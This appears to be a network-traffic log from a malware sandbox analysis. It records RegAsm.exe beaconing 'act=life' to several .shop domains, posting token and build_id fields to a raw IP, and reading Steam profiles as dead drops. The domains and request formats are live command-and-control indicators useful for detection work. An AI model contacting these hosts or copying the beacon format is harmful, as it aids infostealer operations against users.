2024-09-26 18:15:07 UTC	774	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 18:15:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=irt89s7q7583bqpabt5tcokvmj; expires=Mon, 20 Jan 2025 12:01:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYBgVyRzHE%2FFUys0s6cdxbBg8Q832Fpz2lxHNgkDPU%2FwIMPpxm0yMUGmFLf8U%2Fhzt6GR2i8JpddcrQsa6NDzHSqCQ5EYUMwcK05gg6kaG3myPHSmj0ZdlPuq6Sr4wvne%2FxLOIrWA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c953cceec478c8f-EWR
2024-09-26 18:15:07 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 18:15:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49747	188.114.96.3	443	6460	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:08 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vozmeatillu.shop
2024-09-26 18:15:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 18:15:08 UTC	766	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 18:15:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4p62kf8774qo0dmv9i4c9fkbul; expires=Mon, 20 Jan 2025 12:01:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ECWXtiIi1EzytWSniUso15mHs6%2B93dbbRfPfwCjXSK1zNM04NEjLK2GJNByTS5AcDGR182RWiXqYpRPwyZxcAznBK4uz7z%2FAJI9%2FTsGby59DNJqzXnx9rfzqyk0XzKpH7O2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c953cd58a1e41ac-EWR
2024-09-26 18:15:08 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 18:15:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49746	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:08 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:15:08 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------GIIJEBAECGCBKECAAAEBCont
2024-09-26 18:15:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:15:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:15:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49748	172.67.162.108	443	6460	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:10 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawzhotdog.shop
2024-09-26 18:15:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 18:15:10 UTC	766	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 18:15:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u5db4qqr2ddf2kuaefbt4901lh; expires=Mon, 20 Jan 2025 12:01:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JoKTYk3BzcwsanSG4DDIWPz9K5NcEWmMDhZo2brtYJDIMdt9w8r5VJqK0hvZ%2FxpYfj6rtWam%2BM6IwrKrTX0d%2B1Iy3S87wd5rO29cjDMeAwsduFhbaqPaazZiZNwrVEHRlh43"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c953ce13e018f6f-BOS
2024-09-26 18:15:10 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 18:15:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49749	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:10 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:15:10 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------CFHDHIJDGCBAKFIEGHCBCont
2024-09-26 18:15:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:15:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:15:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49750	188.114.96.3	443	6460	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:11 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fragnantbui.shop
2024-09-26 18:15:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 18:15:11 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 18:15:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8invsr66pmgfq3rp2ghtmfm6tt; expires=Mon, 20 Jan 2025 12:01:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zKN%2BI4peHh6yU0%2BUF219SiEeOAMrwiXt3Mr3OFAFoSk%2Fq%2BCVvDtAJ6n7AfeX1ttzbrnQoYw0kQ6R7oMuLHcSoRVY7N9fz40XwGC%2Ff1LhhTb4OSHHifbJ9yh%2F%2Bk%2B6OvYOkWT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c953ce71c7e8c7e-EWR
2024-09-26 18:15:11 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 18:15:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49752	188.114.97.3	443	6460	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:12 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stogeneratmns.shop
2024-09-26 18:15:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 18:15:12 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 18:15:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=usqtf02or5bm706hv4ogofuoab; expires=Mon, 20 Jan 2025 12:01:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6MOIH2Na0tOSoywF9b90ZXKup2wCrTeSxmfhr9ZkS%2F%2FvWLz2wdqb6HmLXLboFyyjjAKUXHcpz4IhEGLep9HHngbRZJsMgGprSncqMrIg%2B05Om5xWE5ZzR03zOuP9gEhXzmKHUH4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c953ced7d0b0cdd-EWR
2024-09-26 18:15:12 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 18:15:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49753	172.67.208.139	443	6460	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:13 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: reinforcenh.shop
2024-09-26 18:15:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 18:15:13 UTC	766	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 18:15:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fkpuujf1j9oebrfmf67k3pb75b; expires=Mon, 20 Jan 2025 12:01:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARBqBJedodl4jfNZDI2WdVe2raofmBLrkkwUhCIGrtdZ3ggO80pXEKpX8a%2BKM6p7EADbu%2FqCoFrzuM7UN17BFgEqQr0yETh4s9XxhSm%2BbaUtkqBw6NlYekKSNsYs6PSx36Bm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c953cf3ddb47d16-EWR
2024-09-26 18:15:13 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 18:15:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49754	104.102.49.254	443	6460	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:14 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-26 18:15:14 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 18:15:14 GMT Content-Length: 34663 Connection: close Set-Cookie: sessionid=61971af95130bd080595137b; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 18:15:14 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 18:15:14 UTC	16384	IN	Data Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
2024-09-26 18:15:14 UTC	3765	IN	Data Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49755	104.21.2.13	443	6460	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:15 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ballotnwu.site
2024-09-26 18:15:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 18:15:15 UTC	774	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 18:15:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6ljafo371g5or8n5ssm45hgqco; expires=Mon, 20 Jan 2025 12:01:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ru4%2FyfOAx0WtEKFZuJ5MKIa%2BMNurPt94mLChZhSrr88b4KupDBgG%2FyqPOdF1nquOcmGElvOCo4WGB9HfQNmMWj%2BKbIth2ZfK4Xo2UAVzrj4C7Evy8L5BCu3a3%2Bgz4xZ5WQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c953d021e21428f-EWR
2024-09-26 18:15:15 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 18:15:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49757	104.102.49.254	443	6696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:38 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:15:38 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 18:15:38 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=82d2cc5556d6e6ab16bab7b6; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 18:15:38 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 18:15:38 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
